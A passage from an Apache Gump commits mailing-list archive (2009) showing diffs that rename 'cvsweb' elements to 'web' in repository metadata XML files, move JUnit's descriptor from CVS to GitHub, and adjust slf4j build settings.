<web>http://cvs.sourceforge.net/cgi-bin/cvsweb.cgi/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/lenya.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/lenya.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/lenya.xml (original) +++ gump/metadata/repository/lenya.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Lenya</title> <home-page>http://lenya.apache.org/</home-page> - <cvsweb>http://svn.apache.org/viewcvs.cgi/lenya/</cvsweb> + <web>http://svn.apache.org/viewcvs.cgi/lenya/</web> <url>http://svn.apache.org/repos/asf/lenya/</url> Modified: gump/metadata/repository/logging.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/logging.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/logging.xml (original) +++ gump/metadata/repository/logging.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="logging" type="svn"> <title>Logging</title> <home-page>http://logging.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/logging/?root=Apache-SVN/</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/logging/?root=Apache-SVN/</web> <url>http://svn.apache.org/repos/asf/logging/</url> <redistributable/> </repository> Modified: gump/metadata/repository/lucene.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/lucene.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/lucene.xml (original) +++ gump/metadata/repository/lucene.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Lucene</title> <home-page>http://jakarta.apache.org/lucene/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/lucene/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/lucene/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/lucene/</url> Modified: gump/metadata/repository/maven.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/maven.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/maven.xml (original) +++ gump/metadata/repository/maven.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="maven" type="svn"> <title>Maven</title> <home-page>http://maven.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/maven/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/maven/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/maven/</url> <redistributable/> </repository> Modified: gump/metadata/repository/mina.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/mina.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/mina.xml (original) +++ gump/metadata/repository/mina.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="mina" type="svn"> <title>Mina</title> <home-page>http://mina.apache.org/</home-page> - <cvsweb>http://svn.apache.org/viewvc/mina/trunk/</cvsweb> + <web>http://svn.apache.org/viewvc/mina/trunk/</web> <redistributable/> <url>http://svn.apache.org/repos/asf/mina/</url> </repository> Modified: gump/metadata/repository/mozilla.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/mozilla.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/mozilla.xml (original) +++ gump/metadata/repository/mozilla.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="mozilla" type="cvs"> <title>Mozilla</title> <home-page>http://www.mozilla.org/</home-page> - <cvsweb>http://lxr.mozilla.org/mozilla/source/</cvsweb> + <web>http://lxr.mozilla.org/mozilla/source/</web> <redistributable/> <root> Modified: gump/metadata/repository/myfaces.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/myfaces.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/myfaces.xml (original) +++ gump/metadata/repository/myfaces.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Myfaces</title> <home-page>http://myfaces.apache.org</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/myfaces/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/myfaces/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/myfaces/</url> Modified: gump/metadata/repository/objectweb.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/objectweb.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/objectweb.xml (original) +++ gump/metadata/repository/objectweb.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="objectweb" type="cvs"> <title>objectweb</title> <home-page>http://www.objectweb.org/</home-page> - <cvsweb>http://cvs.forge.objectweb.org/cgi-bin/viewcvs.cgi/</cvsweb> + <web>http://cvs.forge.objectweb.org/cgi-bin/viewcvs.cgi/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/opensaml.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/opensaml.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/opensaml.xml (original) +++ gump/metadata/repository/opensaml.xml Wed Feb 18 17:10:30 2009 @@ -19,6 +19,6 @@ <repository name="opensaml" type="svn"> <title>OpenSAML</title> <home-page>http://www.opensaml.org/</home-page> - <cvsweb>http://svn.middleware.georgetown.edu/view/</cvsweb> + <web>http://svn.middleware.georgetown.edu/view/</web> <url>https://svn.middleware.georgetown.edu/</url> </repository> Modified: gump/metadata/repository/poi.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/poi.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/poi.xml (original) +++ gump/metadata/repository/poi.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache POI</title> <home-page>http://poi.apache.org</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/poi/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/poi/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/poi/</url> Modified: gump/metadata/repository/portals.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/portals.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/portals.xml (original) +++ gump/metadata/repository/portals.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="portals" type="svn"> <title>Apache Portals</title> <home-page>http://portals.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/portals/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/portals/?root=Apache-SVN</web> <redistributable/> <url>http://svn.apache.org/repos/asf/portals/</url> </repository> Modified: gump/metadata/repository/slf4j.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/slf4j.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/slf4j.xml (original) +++ gump/metadata/repository/slf4j.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Simple Logging Facade for Java</title> <home-page>http://www.slf4j.org/</home-page> - <cvsweb>http://svn.slf4j.org/viewcvs/</cvsweb> + <web>http://svn.slf4j.org/viewcvs/</web> <url>http://svn.slf4j.org/repos/</url> Modified: gump/metadata/repository/smartfrog.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/smartfrog.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/smartfrog.xml (original) +++ gump/metadata/repository/smartfrog.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <title>SmartFrog on SourceForge</title> <home-page>http://sourceforge.net/</home-page> - <cvsweb>http://smartfrog.svn.sourceforge.net/viewvc/smartfrog/</cvsweb> + <web>http://smartfrog.svn.sourceforge.net/viewvc/smartfrog/</web> <url>https://smartfrog.svn.sourceforge.net/svnroot/</url> Modified: gump/metadata/repository/sourceforge-ant-contrib.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/sourceforge-ant-contrib.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/sourceforge-ant-contrib.xml (original) +++ gump/metadata/repository/sourceforge-ant-contrib.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <title>Collection of tasks for Apache Ant.</title> <home-page>http://ant-contrib.sourceforge.net/</home-page> - <cvsweb>http://ant-contrib.svn.sourceforge.net/viewvc/ant-contrib/</cvsweb> + <web>http://ant-contrib.svn.sourceforge.net/viewvc/ant-contrib/</web> <url>https://ant-contrib.svn.sourceforge.net/svnroot/ant-contrib/</url> Modified: gump/metadata/repository/sourceforge-mx4j.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/sourceforge-mx4j.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/sourceforge-mx4j.xml (original) +++ gump/metadata/repository/sourceforge-mx4j.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <title>Open source JMX Implementation.</title> <home-page>http://mx4j.sourceforge.net/</home-page> - <cvsweb>http://mx4j.svn.sourceforge.net/viewvc/mx4j/</cvsweb> + <web>http://mx4j.svn.sourceforge.net/viewvc/mx4j/</web> <url>https://mx4j.svn.sourceforge.net/svnroot/mx4j/</url> Modified: gump/metadata/repository/sourceforge-xmlunit.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/sourceforge-xmlunit.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/sourceforge-xmlunit.xml (original) +++ gump/metadata/repository/sourceforge-xmlunit.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <title>JUnit and NUnit testing for XML.</title> <home-page>http://xmlunit.sourceforge.net/</home-page> - <cvsweb>http://xmlunit.svn.sourceforge.net/viewvc/xmlunit/</cvsweb> + <web>http://xmlunit.svn.sourceforge.net/viewvc/xmlunit/</web> <url>https://xmlunit.svn.sourceforge.net/svnroot/xmlunit/</url> Modified: gump/metadata/repository/sourceforge.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/sourceforge.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/sourceforge.xml (original) +++ gump/metadata/repository/sourceforge.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="sourceforge" type="cvs"> <title>SourceForge</title> <home-page>http://sourceforge.net/</home-page> - <cvsweb>http://cvs.sourceforge.net/cgi-bin/cvsweb.cgi/</cvsweb> + <web>http://cvs.sourceforge.net/cgi-bin/cvsweb.cgi/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/struts-svn.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/struts-svn.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/struts-svn.xml (original) +++ gump/metadata/repository/struts-svn.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <home-page>http://struts.apache.org</home-page> <!-- Bogus, need to rename & just use url below --> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/struts/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/struts/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/struts/</url> Modified: gump/metadata/repository/testng.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/testng.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/testng.xml (original) +++ gump/metadata/repository/testng.xml Wed Feb 18 17:10:30 2009 @@ -19,6 +19,6 @@ <repository name="testng" type="svn"> <title>testng</title> <home-page>http://code.google.com/p/testng/</home-page> - <cvsweb>http://testng.googlecode.com/svn/</cvsweb> + <web>http://testng.googlecode.com/svn/</web> <url>http://testng.googlecode.com/svn/</url> </repository> Modified: gump/metadata/repository/tigris.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/tigris.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/tigris.xml (original) +++ gump/metadata/repository/tigris.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="tigris" type="cvs"> <title>Tigris</title> <home-page>http://www.tigris.org/</home-page> - <cvsweb>http://scarab.tigris.org/source/browse/</cvsweb> + <web>http://scarab.tigris.org/source/browse/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/tomcat.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/tomcat.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/tomcat.xml (original) +++ gump/metadata/repository/tomcat.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Tomcat</title> <home-page>http://tomcat.apache.org</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/tomcat/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/tomcat/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/tomcat/</url> Modified: gump/metadata/repository/turbine.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/turbine.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/turbine.xml (original) +++ gump/metadata/repository/turbine.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Turbine</title> <home-page>http://turbine.apache.org</home-page> - <cvsweb>http://svn.apache.org/viewcvs.cgi/turbine/?root=Apache-SVN</cvsweb> + <web>http://svn.apache.org/viewcvs.cgi/turbine/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/turbine/</url> Modified: gump/metadata/repository/w3c.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/w3c.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/w3c.xml (original) +++ gump/metadata/repository/w3c.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="w3c" type="cvs"> <title>W3C</title> <home-page>http://www.w3.org/</home-page> - <cvsweb>http://dev.w3.org/cvsweb/</cvsweb> + <web>http://dev.w3.org/cvsweb/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/webservices.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/webservices.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/webservices.xml (original) +++ gump/metadata/repository/webservices.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Apache Webservices</title> <home-page>http://jakarta.apache.org/webservices/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs.cgi/webservices/?root=Apache-SVN</cvsweb> + <web>http://cvs.apache.org/viewcvs.cgi/webservices/?root=Apache-SVN</web> <url>http://svn.apache.org/repos/asf/webservices/</url> Modified: gump/metadata/repository/ws-fx.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/ws-fx.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/ws-fx.xml (original) +++ gump/metadata/repository/ws-fx.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <title>Web Service Functionality Extensions (WSFX)</title> <home-page>http://ws.apache.org/ws-fx/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs/</cvsweb> + <web>http://cvs.apache.org/viewcvs/</web> <redistributable /> <root> Modified: gump/metadata/repository/ws.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/ws.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/ws.xml (original) +++ gump/metadata/repository/ws.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="ws" type="cvs"> <title>WebServices</title> <home-page>http://ws.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs/</cvsweb> + <web>http://cvs.apache.org/viewcvs/</web> <redistributable/> <root> Modified: gump/metadata/repository/wyona.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/wyona.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/wyona.xml (original) +++ gump/metadata/repository/wyona.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="wyona" type="cvs"> <title>Wyona</title> <home-page>http://www.wyona.org/</home-page> - <cvsweb>http://cvs.wyona.org/</cvsweb> + <web>http://cvs.wyona.org/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/xalan.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/xalan.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/xalan.xml (original) +++ gump/metadata/repository/xalan.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <home-page>http://xalan.apache.org/</home-page> <!-- Bogus, need to rename & just use url below --> - <cvsweb>http://svn.apache.org/repos/asf/xalan/</cvsweb> + <web>http://svn.apache.org/repos/asf/xalan/</web> <url>http://svn.apache.org/repos/asf/xalan/</url> Modified: gump/metadata/repository/xerces.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/xerces.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/xerces.xml (original) +++ gump/metadata/repository/xerces.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <home-page>http://xerces.apache.org/</home-page> <!-- Bogus, need to rename & just use url below --> - <cvsweb>http://svn.apache.org/repos/asf/xerces/</cvsweb> + <web>http://svn.apache.org/repos/asf/xerces/</web> <url>http://svn.apache.org/repos/asf/xerces/</url> Modified: gump/metadata/repository/xml-svn.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/xml-svn.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/xml-svn.xml (original) +++ gump/metadata/repository/xml-svn.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <home-page>http://xml.apache.org/</home-page> <!-- Bogus, need to rename & just use url below --> - <cvsweb>http://svn.apache.org/repos/asf/xml/</cvsweb> + <web>http://svn.apache.org/repos/asf/xml/</web> <url>http://svn.apache.org/repos/asf/xml/</url> Modified: gump/metadata/repository/xml.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/xml.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/xml.xml (original) +++ gump/metadata/repository/xml.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="xml" type="cvs"> <title>XML</title> <home-page>http://xml.apache.org/</home-page> - <cvsweb>http://cvs.apache.org/viewcvs/</cvsweb> + <web>http://cvs.apache.org/viewcvs/</web> <redistributable/> <root> Modified: gump/metadata/repository/xmlbeans.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/xmlbeans.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/xmlbeans.xml (original) +++ gump/metadata/repository/xmlbeans.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <home-page>http://xml.apache.org/xmlbeans</home-page> <!-- Bogus, need to rename & just use url below --> - <cvsweb>http://svn.apache.org/repos/asf/xmlbeans/</cvsweb> + <web>http://svn.apache.org/repos/asf/xmlbeans/</web> <url>http://svn.apache.org/repos/asf/xmlbeans/</url> Modified: gump/metadata/repository/xmlgraphics.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/xmlgraphics.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/xmlgraphics.xml (original) +++ gump/metadata/repository/xmlgraphics.xml Wed Feb 18 17:10:30 2009 @@ -21,7 +21,7 @@ <home-page>http://xmlgraphics.apache.org/</home-page> <!-- Bogus, need to rename & just use url below --> - <cvsweb>http://svn.apache.org/viewcvs.cgi/xmlgraphics/</cvsweb> + <web>http://svn.apache.org/viewcvs.cgi/xmlgraphics/</web> <url>http://svn.apache.org/repos/asf/xmlgraphics/</url> Modified: gump/metadata/repository/xpp.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/xpp.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/xpp.xml (original) +++ gump/metadata/repository/xpp.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="xpp" type="cvs"> <title>xpp</title> <home-page>http://www.extreme.indiana.edu/xgws/xsoap/xpp/mxp1/index.html</home-page> - <cvsweb>http://www.extreme.indiana.edu/viewcvs/</cvsweb> + <web>http://www.extreme.indiana.edu/viewcvs/</web> <root> <method>pserver</method> Modified: gump/metadata/repository/xstream.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/xstream.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/xstream.xml (original) +++ gump/metadata/repository/xstream.xml Wed Feb 18 17:10:30 2009 @@ -20,7 +20,7 @@ <title>Xstream</title> <home-page>http://xstream.codehaus.org/</home-page> - <cvsweb>http://svn.xstream.codehaus.org/</cvsweb> + <web>http://svn.xstream.codehaus.org/</web> <url>http://svn.codehaus.org/xstream/trunk/</url> Modified: gump/metadata/repository/zenplex.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/zenplex.xml?rev=745574&r1=745573&r2=745574&view=diff ============================================================================== --- gump/metadata/repository/zenplex.xml (original) +++ gump/metadata/repository/zenplex.xml Wed Feb 18 17:10:30 2009 @@ -19,7 +19,7 @@ <repository name="zenplex" type="cvs"> <title>Zenplex</title> <home-page>http://www.zenplex.org/</home-page> - <cvsweb>http://tambora.zenplex.org/cgi-bin/cvsweb.cgi/</cvsweb> + <web>http://tambora.zenplex.org/cgi-bin/cvsweb.cgi/</web> <root> <method>pserver</method> From [email protected] Thu Feb 19 05:07:05 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61159 invoked from network); 19 Feb 2009 05:07:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Feb 2009 05:07:05 -0000 Received: (qmail 98379 invoked by uid 500); 19 Feb 2009 05:07:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98370 invoked by uid 99); 19 Feb 2009 05:07:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 21:07:05 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 05:06:56 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1B47C238896B; Thu, 19 Feb 2009 05:06:35 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745726 - in /gump/metadata: project/junit.xml repository/junit.xml Date: Thu, 19 Feb 2009 05:06:34 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 19 05:06:34 2009 New Revision: 745726 URL: http://svn.apache.org/viewvc?rev=745726&view=rev Log: JUnit is at github now Modified: gump/metadata/project/junit.xml gump/metadata/repository/junit.xml Modified: gump/metadata/project/junit.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/junit.xml?rev=745726&r1=745725&r2=745726&view=diff ============================================================================== --- gump/metadata/project/junit.xml (original) +++ gump/metadata/project/junit.xml Thu Feb 19 05:06:34 2009 @@ -23,7 +23,7 @@ </description> <redistributable/> - <cvs repository="junit" dir="."/> + <git repository="junit"/> <project name="junit"> <package>org.junit</package> Modified: gump/metadata/repository/junit.xml URL: http://svn.apache.org/viewvc/gump/metadata/repository/junit.xml?rev=745726&r1=745725&r2=745726&view=diff ============================================================================== --- gump/metadata/repository/junit.xml (original) +++ gump/metadata/repository/junit.xml Thu Feb 19 05:06:34 2009 @@ -16,16 +16,10 @@ limitations under the License. --> -<repository name="junit" type="cvs"> +<repository name="junit" type="git"> <title>JUnit Test Framework</title> - <home-page>http://sourceforge.net/</home-page> - <web>http://junit.cvs.sourceforge.net/junit/</web> - - <root> - <method>pserver</method> - <user>anonymous</user> - <password></password> - <hostname>junit.cvs.sourceforge.net</hostname> - <path>/cvsroot/junit</path> - </root> + <home-page>http://github.com/KentBeck/junit/</home-page> + <web>http://github.com/KentBeck/junit/tree/master</web> + <redistributable/> + <url>git://github.com/KentBeck/junit.git</url> </repository> From [email protected] Thu Feb 19 05:15:49 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63132 invoked from network); 19 Feb 2009 05:15:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Feb 2009 05:15:49 -0000 Received: (qmail 4857 invoked by uid 500); 19 Feb 2009 05:15:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4847 invoked by uid 99); 19 Feb 2009 05:15:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 21:15:49 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 05:15:48 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 6062023888A3; Thu, 19 Feb 2009 05:15:28 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745729 - in /gump/metadata/testbase: junit-repo.xml profile.xml Date: Thu, 19 Feb 2009 05:15:28 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 19 05:15:27 2009 New Revision: 745729 URL: http://svn.apache.org/viewvc?rev=745729&view=rev Log: can use the main JUNit descriptor again Removed: gump/metadata/testbase/junit-repo.xml Modified: gump/metadata/testbase/profile.xml Modified: gump/metadata/testbase/profile.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/profile.xml?rev=745729&r1=745728&r2=745729&view=diff ============================================================================== --- gump/metadata/testbase/profile.xml (original) +++ gump/metadata/testbase/profile.xml Thu Feb 19 05:15:27 2009 @@ -36,8 +36,7 @@ <repository href="repository/apr.xml"/> <repository href="repository/excalibur-svn.xml"/> <repository href="repository/jakarta-svn.xml"/> - <!-- uses GIT --> - <repository href="testbase/junit-repo.xml"/> + <repository href="repository/junit.xml"/> <repository href="repository/logging.xml"/> <repository href="repository/sourceforge.xml"/> <repository href="repository/xerces.xml"/> From [email protected] Thu Feb 19 07:42:36 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37177 invoked from network); 19 Feb 2009 07:42:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Feb 2009 07:42:35 -0000 Received: (qmail 33256 invoked by uid 500); 19 Feb 2009 07:42:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33247 invoked by uid 99); 19 Feb 2009 07:42:35 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 18 Feb 2009 23:42:35 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 19 Feb 2009 07:42:33 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id ABCB9238896B; Thu, 19 Feb 2009 07:42:12 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r745767 - /gump/metadata/project/slf4j.xml Date: Thu, 19 Feb 2009 07:42:12 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Thu Feb 19 07:42:12 2009 New Revision: 745767 URL: http://svn.apache.org/viewvc?rev=745767&view=rev Log: separate tests from packaging Modified: gump/metadata/project/slf4j.xml Modified: gump/metadata/project/slf4j.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/slf4j.xml?rev=745767&r1=745766&r2=745767&view=diff ============================================================================== --- gump/metadata/project/slf4j.xml (original) +++ gump/metadata/project/slf4j.xml Thu Feb 19 07:42:12 2009 @@ -28,7 +28,9 @@ <project name="slf4j"> <package>org.slf4j</package> - <mvn/> + <mvn> + <property name="maven.test.skip" value="true"/> + </mvn> <option project="commons-collections"/> <option project="commons-logging" ids="commons-logging-api"/> @@ -51,4 +53,9 @@ <license name="LICENSE.txt"/> </project> + + <project name="slf4j-test"> + <mvn/> + 